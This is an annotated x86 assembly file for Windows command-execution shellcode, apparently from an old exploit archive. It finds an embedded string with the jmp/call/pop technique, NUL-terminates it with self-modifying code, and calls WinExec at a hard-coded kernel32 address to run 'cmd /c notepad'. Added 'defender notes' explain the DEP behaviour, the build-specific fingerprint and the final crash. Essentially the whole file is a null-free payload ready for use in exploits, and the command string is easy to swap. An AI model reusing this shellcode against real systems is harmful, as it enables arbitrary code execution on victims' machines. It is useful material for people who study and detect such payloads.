Simple shellcode that allows command execution on Microsoft Windows platforms.
a5a6d5c1a064493d07a7279f0875d3e18e7199ccc79e6c56780408cd1ef3e18c
; Hardcoded, SP-independent command-executing
; shellcode.
; Peter4020@hotmail.com
;
; nasmw -s -fbin -o cmd.s cmd.asm
; Layout: code lives at `start`; the command string lives after the
; `call continue` at `data`. Flow: `jmp` to data, `call` back to `continue`,
; which leaves the string's address on the stack for `pop edi`. The code
; then measures the string (terminated by 0xff, not NUL), patches that
; 0xff into a NUL in place, and calls WinExec through a hard-coded
; absolute address.
;
; Defender notes, each grounded in the instructions below:
;  - `inc byte [edi]` writes into the shellcode's own bytes, so it only
;    runs from writable memory; a DEP/W^X-enforced page faults here before
;    WinExec is ever reached.
;  - `77e6fd35h` is an absolute pointer to what the author labels WinExec;
;    it is only valid for the kernel32.dll build it was taken from
;    (presumably a pre-ASLR build) and is a stable byte-level fingerprint.
;  - The final `int 3h` raises a breakpoint exception, so the host process
;    crashes after the call unless a debugger handles it.
bits 32
start:
jmp short data ; forward to `data`; its `call` returns control to `continue`
continue:
pop edi ; edi = return address pushed by `call continue` = first byte of the db string
mov ecx, 11111111h ; scan bound: up to 286331153 bytes (presumably chosen because it encodes with no 0x00 bytes)
mov ebx, ecx ; keep a copy of the bound to derive the scanned length later
scan:
cld ; DF = 0 so scasb walks edi upwards
mov al, 0ffh ; sentinel to search for: 0xff (the string is not NUL-terminated yet)
repne scasb ; advance edi until [edi] == 0xff; ecx is decremented once per byte examined
xchg ebx, ecx ; ecx = original bound, ebx = count remaining after the scan
sub ecx, ebx ; ecx = bytes consumed = string length + 1 (includes the sentinel)
add edi, 11111110h ; edi -= 1 written as an add/sub pair so neither immediate contains 0x00
sub edi, 11111111h ; ... edi now points at the 0xff sentinel
inc byte [edi] ; 0xff + 1 wraps to 0x00: self-modifying NUL-termination (requires writable memory)
add ecx, 11111110h ; ecx -= 1 via the same null-free add/sub pair
sub ecx, 11111111h ; ... ecx = string length without the sentinel
sub edi, ecx ; edi = address of the first byte of the command string
xor esi, esi ; esi = 0
inc esi ; esi = 1 = SW_SHOWNORMAL (SW_NORMAL), the uCmdShow argument
push esi ; stdcall arguments are pushed right-to-left: uCmdShow first
push edi ; ... then lpCmdLine
mov eax, 77e6fd35h ; absolute address the author identifies as kernel32!WinExec (build-specific, see header)
call eax ; WinExec(lpCmdLine, SW_SHOWNORMAL)
int 3h ; breakpoint trap: terminates the process instead of returning cleanly
data:
call continue ; pushes the address of the bytes that follow, then jumps back to `continue`
db "cmd /c notepad", 0ffh ; command string with the 0xff sentinel that is patched to NUL above